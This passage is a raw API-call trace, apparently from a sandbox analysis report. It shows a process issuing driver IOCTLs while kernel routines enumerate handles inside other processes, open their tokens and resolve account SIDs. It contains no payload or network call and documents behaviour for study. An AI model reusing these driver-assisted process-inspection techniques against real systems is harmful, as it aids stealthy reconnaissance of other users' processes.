HandleInformation=0x0) returned 0x0 [0226.632] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.633] PsReleaseProcessExitSynchronization () returned 0x2 [0226.633] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0226.633] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.633] ObfDereferenceObject (Object=0xfffffa800213db50) returned 0x1 [0226.633] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.633] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.633] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.633] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.633] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.633] PsAcquireProcessExitSynchronization () returned 0x0 [0226.633] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880052b35d0) [0226.633] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.633] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.633] PsReleaseProcessExitSynchronization () returned 0x2 [0226.633] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0226.633] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.633] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.633] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.633] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.633] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.633] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0226.633] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.633] PsAcquireProcessExitSynchronization () returned 0x0 [0226.633] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880052b35d0) [0226.633] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002131950, HandleInformation=0x0) returned 0x0 [0226.633] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.633] PsReleaseProcessExitSynchronization () returned 0x2 [0226.633] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0226.633] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.633] ObfDereferenceObject (Object=0xfffffa8002131950) returned 0x1 [0226.633] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.634] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.634] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.634] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.634] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.634] PsAcquireProcessExitSynchronization () returned 0x0 [0226.634] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880052b35d0) [0226.634] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0019075e0, HandleInformation=0x0) returned 0x0 [0226.634] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.634] PsReleaseProcessExitSynchronization () returned 0x2 [0226.634] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0226.634] ObQueryNameString (in: Object=0xfffff8a0019075e0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.634] ObfDereferenceObject (Object=0xfffff8a0019075e0) returned 0x1 [0226.634] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.634] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a4) returned 0xc8 [0226.634] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.634] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002148b30, HandleInformation=0x0) returned 0x0 [0226.634] ObOpenObjectByPointer (in: Object=0xfffffa8002148b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.634] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x14 [0226.634] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.634] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.634] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.634] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.634] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.636] CloseHandle (hObject=0xc4) returned 1 [0226.636] CloseHandle (hObject=0xc8) returned 1 [0226.636] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.636] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.636] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.636] PsAcquireProcessExitSynchronization () returned 0x0 [0226.636] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880052b35d0) [0226.636] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800213c240, HandleInformation=0x0) returned 0x0 [0226.636] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.636] PsReleaseProcessExitSynchronization () returned 0x2 [0226.636] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0226.636] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.636] ObfDereferenceObject (Object=0xfffffa800213c240) returned 0x1 [0226.636] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.636] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.636] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.637] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0226.637] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.637] PsAcquireProcessExitSynchronization () returned 0x0 [0226.637] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880052b35d0) [0226.637] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800214b8c0, HandleInformation=0x0) returned 0x0 [0226.637] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.637] PsReleaseProcessExitSynchronization () returned 0x2 [0226.637] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0226.637] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.637] ObfDereferenceObject (Object=0xfffffa800214b8c0) returned 0x1 [0226.637] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.637] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.637] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.637] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.637] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.637] PsAcquireProcessExitSynchronization () returned 0x0 [0226.637] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880052b35d0) [0226.637] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.637] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.637] PsReleaseProcessExitSynchronization () returned 0x2 [0226.637] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0226.637] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.637] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.637] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.637] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.637] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.637] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0226.637] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.637] PsAcquireProcessExitSynchronization () returned 0x0 [0226.637] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880052b35d0) [0226.637] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80021546f0, HandleInformation=0x0) returned 0x0 [0226.637] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.638] PsReleaseProcessExitSynchronization () returned 0x2 [0226.638] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0226.638] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.638] ObfDereferenceObject (Object=0xfffffa80021546f0) returned 0x1 [0226.638] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.638] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.638] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.638] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.638] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.638] PsAcquireProcessExitSynchronization () returned 0x0 [0226.638] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880052b35d0) [0226.638] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00190eac0, HandleInformation=0x0) returned 0x0 [0226.638] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.638] PsReleaseProcessExitSynchronization () returned 0x2 [0226.638] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0226.638] ObQueryNameString (in: Object=0xfffff8a00190eac0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.638] ObfDereferenceObject (Object=0xfffff8a00190eac0) returned 0x1 [0226.638] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.638] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9b4) returned 0xc8 [0226.638] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.638] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002155060, HandleInformation=0x0) returned 0x0 [0226.638] ObOpenObjectByPointer (in: Object=0xfffffa8002155060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.638] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x14 [0226.638] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.638] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.638] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.638] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.639] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.640] CloseHandle (hObject=0xc4) returned 1 [0226.640] CloseHandle (hObject=0xc8) returned 1 [0226.640] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.640] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.640] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.640] PsAcquireProcessExitSynchronization () returned 0x0 [0226.640] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002155060, ApcState=0xfffff880052b35d0) [0226.640] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002151170, HandleInformation=0x0) returned 0x0 [0226.640] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.641] PsReleaseProcessExitSynchronization () returned 0x2 [0226.641] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0226.641] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b7c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315b7c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.641] ObfDereferenceObject (Object=0xfffffa8002151170) returned 0x1 [0226.641] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.641] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.641] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.641] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0226.641] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.641] PsAcquireProcessExitSynchronization () returned 0x0 [0226.641] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002155060, ApcState=0xfffff880052b35d0) [0226.641] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002133330, HandleInformation=0x0) returned 0x0 [0226.641] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.641] PsReleaseProcessExitSynchronization () returned 0x2 [0226.641] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0226.641] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.641] ObfDereferenceObject (Object=0xfffffa8002133330) returned 0x1 [0226.641] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.641] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.641] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.641] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.641] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.641] PsAcquireProcessExitSynchronization () returned 0x0 [0226.641] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002155060, ApcState=0xfffff880052b35d0) [0226.641] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.641] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.641] PsReleaseProcessExitSynchronization () returned 0x2 [0226.641] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0226.641] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.641] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.641] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.642] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.642] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.642] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0226.642] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.642] PsAcquireProcessExitSynchronization () returned 0x0 [0226.642] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002155060, ApcState=0xfffff880052b35d0) [0226.642] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002151a90, HandleInformation=0x0) returned 0x0 [0226.642] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.642] PsReleaseProcessExitSynchronization () returned 0x2 [0226.642] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0226.642] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.642] ObfDereferenceObject (Object=0xfffffa8002151a90) returned 0x1 [0226.642] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.642] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.642] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.642] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.642] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.642] PsAcquireProcessExitSynchronization () returned 0x0 [0226.642] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002155060, 